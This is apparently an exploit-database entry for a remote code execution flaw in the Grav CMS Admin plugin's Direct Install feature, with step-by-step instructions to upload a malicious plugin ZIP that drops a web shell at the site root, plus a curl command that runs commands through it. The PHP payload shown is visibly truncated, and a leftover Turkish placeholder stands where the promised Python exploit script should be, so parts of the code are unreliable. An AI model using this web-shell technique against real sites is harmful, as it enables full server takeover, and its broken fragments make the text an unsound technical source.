# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE) # Date: 2026-05-08 # Exploit Author: Mustafa Murat Akgül # Vendor Homepage: https://getgrav.org/ # Software Link: https://github.com/getgrav/grav # Version: < 2.0.0-beta.2 # CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw # Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled) Technical Details: The Grav CMS "Direct Install" feature in the Admin plugin allows administrators to upload plugins as ZIP files. The system failed to adequately validate the contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction. By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized), an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory. Proof of Concept (PoC): 1. Create a malicious plugin structure: - shellplugin/blueprints.yaml - shellplugin/shellplugin.yaml - shellplugin/shellplugin.php (Payload below) --- shellplugin.php --- ['onPluginsInitialized', 0]]; } public function onPluginsInitialized(): void { $shell_path = GRAV_ROOT . '/shell.php'; if (!file_exists($shell_path)) { file_put_contents($shell_path, ''); } } } ---------------------- 2. Compress the directory: $ zip -r shellplugin.zip shellplugin/ 3. Log in to the Grav Admin panel and navigate to: /admin/tools/direct-install 4. Upload the 'shellplugin.zip' file. 5. Once installed, the plugin triggers on the next request to the site, dropping a shell at the root. 6. Access your shell: curl "http:///shell.php?cmd=id" Exploit Script (Python): [Buraya yukarıda paylaştığın Python scriptini ekleyebilirsin] Impact: Full system-level access under the context of the web server user. An attacker with administrative privileges (or via CSRF) can compromise the entire server.